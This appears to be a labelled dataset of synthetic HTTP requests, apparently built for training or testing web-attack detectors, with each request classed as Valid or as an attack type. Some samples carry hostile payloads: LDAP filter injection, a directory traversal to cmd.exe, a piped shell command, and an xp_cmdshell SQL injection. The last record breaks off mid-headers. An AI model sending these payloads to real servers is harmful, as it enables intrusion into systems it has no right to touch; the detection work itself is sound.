~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16418
Start - Id: 38539
class: LdapInjection
GET /htrhRehQrchbnds/7Vd3vHlwmKvp/yFaXDh_Ah0XbNKE-r/khlvJAOJ3e90.jpg?on=hOtEw.pKA&Gdusoeimse=0221&8swatdlxO=tunii%29%28%26%28objectClass+%3Deh3*%29 HTTP/1.0
Host: www.wdhetci.be:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: gb2312;q=0.5, x-mac-turkish
Accept-Encoding: 
Accept-Language: co-helIi, yorwr-f8nA0;q=0.1, O-1, tf-ivlekf9;q=0.0
Cache-Control: only-if-cached
Client-ip: 101.131.250.156
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="187"
Date: Mon, 03 Oct 05 24:33:50 UTC
ETag: W/"LzfgK5k748beRBr_"
Expect: yyiraR
From: eTmmd@usijk.cz
If-Modified-Since: Thu, 16 Apr 09 19:56:01 GMT
If-Unmodified-Since: Sun, 15 Jun 08 18:51:33 CET
If-Match: "hWV.fZGRNY.dzhxRF5Ju"
If-None-Match: *
If-Range: Thu, 24 Mar 05 05:46:52 CET
Max-Forwards: 06
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: c0hR cjoints=SGlhrsu
Range: 447-,158917-
Referer: http://iate.org/xkeet9/dte66dnt/tdrNm/s33vph/alx6s.jsp
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/3.2 (Windows; U; Win98 3.9; ta-h9; rv:9.4.6) Gecko/60709177
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8726x4401
Via: 1.8 100.234.172.22, 0.1 130.177.53.180
Transfer-Encoding: deflate
Upgrade: nuhgRe/9.5
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38539
Start - Id: 37646
class: LdapInjection
POST /GTL3aWJmKE5gb/BK@pcopyinNgwVYx/C6IN/_y_sxXG/jFzsock_streamQXA1nEvw/taoeevsola/_u38Mhomeb.orsnVk.jpg? HTTP/1.1
Content-Length: 294
Content-Language: eey
Content-Encoding: deflate
Content-Location: /iair/eqodxnt/or5ooeor/1yewds.png
Content-MD5: dG5udDZlZGZ0ZWRud2VjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 May 07 23:26:28 CET
Last-Modified: Sun, 07 Jan 07 21:38:09 GMT
Host: 55.203.10.139
Connection: estsA
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip;q=0.5, gzip, identity;q=0.7
Accept-Language: *;q=0.2
Cache-Control: min-fresh=3283
Client-ip: 76.236.29.239
Cookie: cehboltDsnte=769836639;dNrt=99471;5tzz=309
Cookie2: $Version="67"
Date: Thu, 07 Jan 10 06:08:30 CET
ETag: "5CsxZ0n_JYvh4GoyRbX"
Expect: nuie
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Wed, 20 Aug 08 12:50:52 UTC
If-Unmodified-Since: Thu, 28 Jul 05 09:51:38 CET
If-Match: "PQsJZLjFWJ6W1hgxzAU"
If-None-Match: "KL.pf_@gZIfH.q8Z"
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 3
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /eaDtnttn/9auE/efalLadn/eeonla/Obwtla3.conf
TE: chunked
Trailer: TE
User-Agent: Mozilla/6.4 (compatible; Konqueror/9.7; Mac OS X; s0m2sT; sthyv3; 0re1ittnpr)
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: 3.8 www.escu6Nen.jpg, HTTP/3.6 www.ewEt.js
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 189.116.98.106
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Du8RnbnR3=DeustZgun82Ipt&dsbxhiilyeDmh=826&dl=toizft&qho=891122&9nEm@id=lAraLCg6R&adloe98cpii=00271735&titt=tfo6dva4kaEes&otmitjs=6625482&3wo=")(targetfilter=(o=NetscapeRoot))&rautaazeeekG=3949293818&naaineTsAagPov=dteee5te&wzb1e=toitko?&xetti8a8=htaccesinnRefignndunioncQ a p

End - Id: 37646
Start - Id: 19844
class: Valid
GET /oU6B3MVL.pZ@@/urbteErtijrtwoo3sas/ALa2Rtmp/lf9Yj4.7Nd3jL5dQuya/aoh6irOd/Eeen47/h3I/hghDrSpA7T/tG.css? HTTP/1.0
Host: 82.108.136.64
Connection: close
Accept: application/*, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.5, gzip;q=0.4, deflate, gzip, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 18.141.33.165
Cookie: t8jincalt4sengl=seAcayuehn7xh;e6osb5cLntetcke=eadMuG1Revi;d4drvmsttrt=where$unionb11r\(lhkt;nmaseeebigtuj=aev&nllnm;4unionUFX9KinputGVn=57
Cookie2: $Version="71"
Date: Sat, 14 Jan 06 02:57:37 CET
ETag: "QqBFDe-vjUadicJInMe"
Expect: 100-continue
From: gu7i51@tt3gils.biz
If-Modified-Since: Mon, 09 Jan 06 04:45:09 GMT
If-Unmodified-Since: Mon, 17 Nov 08 16:38:20 UTC
If-Match: "AuoU3yG@JtCE4dBCnHdc"
If-None-Match: "kwUct1BhYN-qxHn4HDkn"
If-Range: Sun, 23 Dec 07 03:17:44 UTC
Max-Forwards: 6
MIME-Version: 2.8
Pragma: SH=db
Proxy-Authorization: NTLM Y0dvbnp0c2xhZXdyaDl0empuOXJvUjRtdGVpbk9seXJ6aXI=
Authorization: vlhlc fsgh0=mOUmdh
Range: 31-27672,31-,92-
Referer: /Esspr/mseOdeno/hdabInt/onsUwyl/asdhpA2.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (compatible; Konqueror/2.8; Win 9x; etsSty; eosb9eSt)
UA-CPU: StrongARM
UA-Disp: 9849,2633,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: een/4.2 209.102.138.43, 1.6 74.36.67.200
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19844
Start - Id: 7330
class: Valid
PUT /.vPestylegD_p/3dahmktdDeoo.bin? HTTP/1.1
Content-Length: 69
Content-Language: 8,hru,4v7t
Content-Encoding: identity
Content-Location: http://7topllmh.uk/uins/gfItdr/fieotlr1.jpg
Content-MD5: aW9sUmxzbG8wbnRhZU5uaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Aug 05 08:29:22 CET
Last-Modified: Thu, 24 Sep 09 24:22:28 UTC
Host: 248.71.139.67
Connection: close
Accept: video/quicktime, application/rtf;q=0.2, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: c7-ssvufmo3;q=0.5, mnlhckf-anoN;q=0.2, sjhn-lbgqs;q=0.3, s0-ftpmrxh
Cache-Control: only-if-cached
Client-ip: 217.32.33.14
Cookie: nph-HlvhY_S=83461;wetij=eOD7
Cookie2: $Version="61"
Date: Fri, 29 Sep 06 06:08:21 CET
ETag: "0f.tdNKOtoBuNtgNg"
Expect: esituigt
From: mHrrayts@zrc6snifaP.ch
If-Modified-Since: Thu, 26 May 05 19:27:30 UTC
If-Unmodified-Since: Thu, 31 Jan 08 24:38:29 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 8.2
Pragma: ahhS67e='5'
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: NTLM bnQ0T25hbm9naGVjdFRpc2JhZGRqb1l5c3JpaHIyYWVhdA==
Range: 8-57,12-302,31375-71
Referer: http://www.elwishr9.be/gherez/tE8m0hes/ntnt.zip
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.1 (compatible; anroi; WinNT; nses)
UA-CPU: 68000
UA-Disp: 688,983,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: aa1/8.9, ikaj/1.3, thxcol/4.5
Warning: 203 www.dmeaU2e.htm "snkasehreMi8RjfNhe" 
X-Forwarded-For: 10.175.216.186
X-Serial-Number: 0347000130099147
----: --------------------------------
~~~~~: ~~~~~~~~~~~~

zFBBg8ESD=587&ssrTiiIndii=nowP&ctsiinvue9srnDn=D=1&CXcGvvM=aA&82x=l

End - Id: 7330
Start - Id: 9004
class: Valid
GET /onhaoustzagdenoJo/zk4NDiNIcO.aspx?aahadpsbt=495201&lzodco=3620012&oactetnoobnc8=395&IiieeylscS=%24nsfi4wadhx&venoasi=ev2%3D%7E&t5c7Co2tcv=6294&kDUY-=h&fn=connects%25ne&ltar=n HTTP/1.1
Host: www.us7e.org:826
Connection: keep-alive
Accept: application/rtf;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 8Bb-mi;q=0.4, Wexw-S4
Cache-Control: 6Njohu=ieWeS9
Client-ip: 50.124.25.51
Cookie: ury9eaoasierSr=22;uadfgbitEncui=sselilocationef6;FdAqJ.4hJ=iP6ms6oe@Ur;fitQ6OelnoeobE=apu9t&]w6?6telnetr;xod=iid;rr=41
Cookie2: $Version="153"
Date: Wed, 02 Aug 06 02:25:14 UTC
ETag: W/"Zd4TEEiadfEZVn1TSmFm"
Expect: 100-continue
From: o4sw@mrdNiutFwy.st
If-Modified-Since: Wed, 27 Feb 08 02:33:33 UTC
If-Unmodified-Since: Thu, 24 Dec 09 24:07:05 UTC
If-Match: "cJ-Dml3lm8oefjhsIH"
If-None-Match: "xAF2L_kfgcLzom7nAU"
If-Range: "Ph3R8js68YUIFelq"
Max-Forwards: 0
MIME-Version: 6.2
Pragma: r='isicm185'
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: hzpnip ADlaao=mcDudt
Range: 083-
Referer: http://CnC07.st/hoaoatea/zonfikt/gonht7E.php
TE: chunked;q=0.8,gzip
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (X11; U; Solaris 2.1; hg-7t; rv:0.3.6) Gecko/72858983
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7350x9086
Via: 6.9 www.Ae8iti.html, HTTP/6.0 www.todm3.js
Transfer-Encoding: identity
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9004
Start - Id: 26279
class: Valid
GET /cbEbahieseormhyhT/_a/a8KRLW_lKE/wO.ysamGbodyrwp-3EQtsamd/euADyRzq/r_XSperl7/gw0/6i0Jb/rMRtKnXusPbGnlcdJ/hz/aseuNSiraeptctaextg.pl?3mshsn=20&idec=869236 HTTP/1.0
Host: 181.36.238.246
Connection: eTtblT
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.8, deflate;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 245.57.221.112
Cookie: lyoeeg=awNAaoaoinoeec;t3=+;nYnablfh=n8e;Ea34lhe=v_g0EbUj93tD
Cookie2: $Version="2"
Date: Tue, 21 Jul 09 02:40:22 CET
ETag: "wVO5U.11JOdCxcIz4TQp"
Expect: 100-continue
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Mon, 18 Sep 06 09:56:11 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: "QNM7.lV.D1eHng1Eqx"
Max-Forwards: 93
MIME-Version: 8.0
Pragma: P16h7=hmo
Proxy-Authorization: acru cnsecA=hl44nb3l
Authorization: iz8S cnlLiiuw=4ahe3hs
Range: -844,-3965
Referer: /dt3dndg/diI3/ghwtln.mpg
TE: chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (Windows; U; Win98 0.6; yh-ii; rv:3.8.7) Gecko/80311782
UA-CPU: 68000
UA-Disp: 509,4481,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 506x933
Via: 4.2 61.82.4.57
Transfer-Encoding: deflate
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26279
Start - Id: 8396
class: Valid
GET /dOl71D715wN/stDPEAI3v-AZ30_cWg/ejQFz/gtstIediEtqipnea/9k@G5KDvq2perl/Yy/ei/969nX3fgCSgEOm/1mrhfMHooveC8n23le.cgi?8aAmmjv77=203&inn=luGDG&nm=e%5DGm&a4eiwtOnbEnt8gh=gtkounetcatszjhtet%24ra&Hd7tccwcssmuri=033592&6BrEiy=960&PwSAconnectnu=ht&x2wDNtrrnm=rpXEkhUcodz&aSklN2roenduy=291613&EsmiB=Olink+h&luuclra=CdC%3Ds HTTP/1.0
Host: 227.155.50.194
Connection: keep-alive
Accept: image/gif
Accept-Charset: cp-932;q=0.7, koi8
Accept-Encoding: gzip;q=0.9, identity
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 147.158.178.34
Cookie: 1AH5DNmf@Ndz=e6;atsoetimdRp5mno=Die3mfeltcfiuOusW;6yneAOtv=vdtibsdidaae;hnvequoOabtier=p4Em
Cookie2: $Version="05"
Date: Sat, 02 Aug 08 01:20:25 GMT
ETag: W/"yMsnma215J4vBEp"
Expect: itte2pI
From: eeqsa@nsrtpHttai.com
If-Modified-Since: Tue, 15 Jul 08 03:56:40 GMT
If-Unmodified-Since: Sat, 18 Jun 05 24:28:28 CET
If-Match: "5bBGfhvC4zjTPLU9_c"
If-None-Match: *
If-Range: "driQburhWrukrhl"
Max-Forwards: 8346
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: Digest nonce
Range: 994131-66069
Referer: http://www.znlx.de/iaerwYA/utqhfie/ehgn/ugthow.txt
TE: chunked,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/4.7 (compatible; Konqueror/8.0; Solaris; aegEegtc)
UA-CPU: MIPS
UA-Disp: 755,5837,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 928x374
Via: 0.2 96.4.66.200:9, 6rhda7/9.2 www.csydael.shtml:5587, FTP/8.1 www.tRcbie.htm
Transfer-Encoding: gzip
Upgrade: babste/4.1
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 5442367838332838
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8396
Start - Id: 36563
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 180.147.91.178
Connection: keep-alive
Accept: text/*, text/*, audio/basic;q=0.9
Accept-Charset: iso-8859-8, windows-1255;q=0.0, x-mac-chinesetrad;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=17
Client-ip: 199.190.231.15
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="910"
Date: Sat, 16 Oct 04 06:14:02 CET
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: osNAoh@aHn2nry.de
If-Modified-Since: Sat, 11 Sep 04 21:16:21 GMT
If-Unmodified-Since: Fri, 17 Oct 08 02:22:47 CET
If-Match: "p1IY0hBynYBC.mNb"
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 4.8
Pragma: uyT8t9do=eyre6
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: http://siealnlE.com/yehrRh/rolem/s3ehlnh/eDerhu0w/pul7.jpeg
TE: chunked;q=0.4
Trailer: If-Match
User-Agent: Mozilla/9.8 (compatible; bibeuaLe; Win 9x; rcElerrX; t38nl8o)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: identity
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36563
Start - Id: 34876
class: Valid
POST /lyzyZZz7pQFdhvM/eEsene2egb9ogneSoia/nQK_v.B1YyOIg3/e34v@PoM6wJJ2t_EV/adfrliaoeie1/hID/sRXzl_FFf/ydPT6X0n2/aZ95SxR3gwhbw9-@Vc.tiff? HTTP/1.1
Content-Length: 43
Content-Language: me,n4k
Content-Encoding: gzip
Content-Location: /bjrsozj/xtefnt/Tonq/eEXAhaV.dll
Content-MD5: dG5lZEFldTRlbmF0ZU9hbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 09 16:48:40 UTC
Last-Modified: Tue, 01 Feb 05 19:49:30 UTC
Host: 70.185.141.70:80
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.3, iso-8859-3, iso-8859-6;q=0.0, windows-1251, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: 5ht=Efy8ron
Client-ip: 121.207.10.30
Cookie: Ourvo7=jaeemo7Ztae9o;nni5ss0euqeoa=8532184
Cookie2: $Version="22"
Date: Mon, 02 Feb 04 17:59:02 GMT
ETag: "cklLOiPILWad6QGMGdT7"
Expect: 100-continue
From: gdoiesi5@hovn.gov
If-Modified-Since: Thu, 27 Mar 08 12:37:32 CET
If-Unmodified-Since: Fri, 30 Jan 04 13:00:55 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Apr 07 14:44:19 CET
Max-Forwards: 26
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic Q3NsZWdlbzptaG9McGg=
Authorization: r6tiem 6txw=nUly
Range: 953-,-8,5909-
Referer: /wb1r1uI.pdf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 3.9; d0-on; rv:2.6.3) Gecko/53074507
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 084x478
Via: FTP/4.3 235.77.19.174, FTP/8.9 167.164.33.50
Transfer-Encoding: deflate
Upgrade: hamne/3.4, eeao/8.6, ewdlee/6.5, ubYty/3.3
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9nwhi7guinfo=hHqY&e0feb=aicopy=&detmp1=b 

End - Id: 34876
Start - Id: 27477
class: Valid
GET /slnrlRpouU/nhms2ne2ytsuobie2gm.jpg?ydsnhabuiAze8=7&4jlz=5e%2F&tksTunmhc=se0de%7E&yiou=a&vle7=556&ogrEre=655688896&gi4pd=ajV&Rhotwe1cweeae=xdh%7ComuDe5%3An&nuiE=282&iwinct13e=ej9o&oVk9r0HnlO=l3bintcV&Mm=a44PGvD4abMP&tiqtouh=wjTh HTTP/1.0
Host: www.sXeys.org
Connection: hca5zD
Accept: video/*;q=0.6, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: r=usmcbcf
Client-ip: 179.32.54.219
Cookie: KEuIUEmU8ncJ=94965954
Cookie2: $Version="5"
Date: Fri, 16 Mar 07 01:33:11 CET
ETag: W/"i0u@t62NypJkPyF6q"
Expect: loselr
From: situra@sD6ieWtri.cz
If-Modified-Since: Mon, 02 Jan 06 13:09:35 GMT
If-Unmodified-Since: Thu, 08 Dec 05 12:10:14 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Nov 04 09:27:04 GMT
Max-Forwards: 2
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: butNst znws=oeietn
Authorization: Basic Tm5zZWM0czpyZU9k
Range: -526042
Referer: http://lalhl.biz/ohtsots.jsp
TE: chunked;q=0.9,deflate;q=0.7
Trailer: Referer
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 9.6; nN-el; rv:3.6.3) Gecko/35610869
UA-CPU: StrongARM
UA-Disp: 617,9793,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 802x162
Via: ybyr4/0.7 3.188.213.235, 8.7 178.24.47.56, icl/2.2 www.t06se.html:1
Transfer-Encoding: gzip
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 874 www.owRuocd.js "2ei4cbcrn2" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27477
Start - Id: 27671
class: Valid
GET /oCmsuh/BukallwxC/hce/deduirercafR/wc3hiTjfuteeHtoanv/tj.9rjeTuOIU7Ak3Skre/icpherttitm/lBga@rfoj8.si_kOTD/y3l.YKQ6eycEKqWuT8xH/noIAlxojdulzprrrp/ishrl6He/iurtana.pl?group byVoe6iB=otehrhdutgtrjn&pngicsE=dax&csk=6eSes&jn8etasrenh=kDBfv&rtcn0ydia9hoo=al9caexisamPeuae6ftelnetcr&SatoseTtfh=847816&smeRe9cne4s3h=jnHEAGmdc0&Trtelj=aa+ HTTP/1.1
Host: www.t0eooe.uk
Connection: close
Accept: application/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: compress, identity;q=0.4, compress
Accept-Language: *
Cache-Control: max-age=54113
Client-ip: 30.225.36.55
Cookie: Egyln=0;xdmRlsFa=oEMoa;r9lueo(tt;neeeRrx=e~ iallo h?gdHt&nBt;1TJwphkpV=6021441824;z9odi=6;oCsdorwntetbrp=ovwindow.open 296- php
Cookie2: $Version="090"
Date: Tue, 06 Jan 09 24:11:13 CET
ETag: ".0HZLsvWECLFYqDWWN.f"
Expect: 100-continue
From: rjtsrn@aa1capeO.gov
If-Modified-Since: Fri, 29 Jun 07 03:55:17 CET
If-Unmodified-Since: Wed, 10 Feb 10 22:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 11:41:44 GMT
Max-Forwards: 351
MIME-Version: 9.6
Pragma: n=dqNAyy
Proxy-Authorization: Digest realm
Authorization: NTLM RXRlaXc4YTFkMWlpaWlvd3Njc2RvaHJldWpuZW9yU2ZkcDZobmk=
Range: -1685,0732-,-35
Referer: /be1yDt.swf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.3 (X11; U; Unix 7.2; I9-ee; rv:0.5.2) Gecko/58199002
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 4.3 116.212.83.129, 0.8 177.77.246.244
Transfer-Encoding: gzip
Upgrade: fplbe/4.0, d0U/8.1, tbez1/9.2, tmorf/3.1, obhnA/2.1
Warning: 040 8.52.207.130:9769 "wsi8q4slsttilo" 
X-Forwarded-For: 255.98.39.97
X-Serial-Number: 17920523075405
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27671
Start - Id: 44621
class: OsCommanding
GET /bAVhEe5YFv/hRQeAoAV9P8zs7xj/hEFXV3X/8bODM5Wt/aT5eoHeai7uRcuweeepE/cNB8gAu7bLDOAoyW-6FB/rweNqp/eHtcAlesyiSgote2rer/tgo@qEE9hXiRWNXMl/eaF3Xj/hseoIicote9ew/nn1tdtscjeeny.gif?trtr=46.35.242.32+++%7C++++echo+%22test%22+%3Eevilfile.txt HTTP/1.1
Host: 210.36.206.25:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-950;q=0.9, iso-8859-2;q=0.8, iso-8859-2, x-mac-turkish, iso-8859-9;q=0.9
Accept-Encoding: identity;q=0.0, gzip;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 199.28.5.222
Cookie: uh2aaiwdr=44790590;uot=5iorip atit;
Cookie2: $Version="361"
Date: Sun, 28 Nov 04 24:46:18 UTC
ETag: W/"gkaNyei91XNxgaZu"
From: ad237uo@EsXlle.it
If-Modified-Since: Tue, 07 Oct 08 13:40:06 UTC
If-Unmodified-Since: Thu, 01 Apr 10 09:33:49 GMT
If-None-Match: *
If-Range: "0HJt884gtLyv8O3EPNqJ"
Pragma: yiniep=unta
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: /eGrn/s31i/exona8/sxyrgo/cnHor05.dll
TE: chunked
Trailer: Connection
User-Agent: ettg5Jsnab (tyy-8q6)
UA-Disp: 5966,1214,32
Via: 4.7 210.122.213.2
Warning: 713 www.5hi1.png:3491 "euraaru3tewoaaaheo" "Mon, 03 May 10 06:40:58 UTC"
X-Forwarded-For: 243.158.215.195
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44621
Start - Id: 25410
class: Valid
GET /vZhf9H.3-sB7ahfS8g/sheAkq6pXkug.cgi?pt7ltatfttt9t=11463796&TRnlhy=seenaioslb&9utfEeecF=ea&lfRcf=aatp%2B&74N2eaiwcIoSna=9luencpsiiBingca%29o%29eH1%25&scripttNjSstbB=geGe+htci&IohHheejit2=Acm4eieerut&HtslordieeC3=950497&nT=12625817&Os9kyeioepeeefT=03396&jASky=4197116609&rrs7to=1860393 HTTP/1.0
Host: 171.137.187.221
Connection: keep-alive
Accept: text/plain
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 141.90.56.165
Cookie: osa=549452;hpn=7Yd;8t9weos=noder;FzuusrVtLI8@Yc=pWDm.l.;cDsOreoo3sjhu=a5sVLA3-dwjC
Cookie2: $Version="78"
Date: Fri, 22 Jan 10 21:39:57 GMT
ETag: W/"86zV6sHHC7QE3@s"
Expect: tzyu
From: ledpneia@lcpqUt.de
If-Modified-Since: Sat, 29 Dec 07 02:50:57 UTC
If-Unmodified-Since: Wed, 14 Apr 10 20:04:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2104
MIME-Version: 9.1
Pragma: ZAaieh1d='Yiiuxi'
Proxy-Authorization: NTLM TnNpZW5pdGxvbXB0MlMxbWFzdGFhT2NoaG5hRmFlb25mZGUydDg=
Authorization: Digest qop=auth-int
Range: 06-841799,-16,747140-
Referer: http://tthapw.uk/rcyezzka/hylio/e3oc/nWJ0.php3
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 7.5; qc-ci; rv:2.4.4) Gecko/51580686
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: HTTP/1.5 234.144.220.156, 6.0 www.9aebua.shtml
Transfer-Encoding: identity
Upgrade: rdnje/3.5, hyoyro/9.8, sao/2.7
Warning: 672 www.jiLqnc.html "r6wi" "Mon, 09 Aug 04 24:45:50 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 683996074816656
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25410
Start - Id: 41113
class: SqlInjection
GET /xazrgn.mspx?uahos=7t%3B&atx=ialxp_eMedaaiee&Rachn9osbar=48147941&l8aa=snF&8t7sf=felygE%5Ce&eauisShe=exec++++xp_cmdshell+%27%222eg%22+++%3E%3E++script.vbs%27&biiX4tesDlee1m=713038&ehrcsear=530 HTTP/1.0
Host: 20.175.65.30
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.9, koi8-r, iso-8859-6;q=0.5
Accept-Encoding: 
Accept-Language: j-2tl9s9n, ehTrdz-rfendt;q=0.4, tukceaa-hhlnrfi;q=0.1, 9essa-rOa8xnR;q=0.7
Cache-Control: max-age=2592
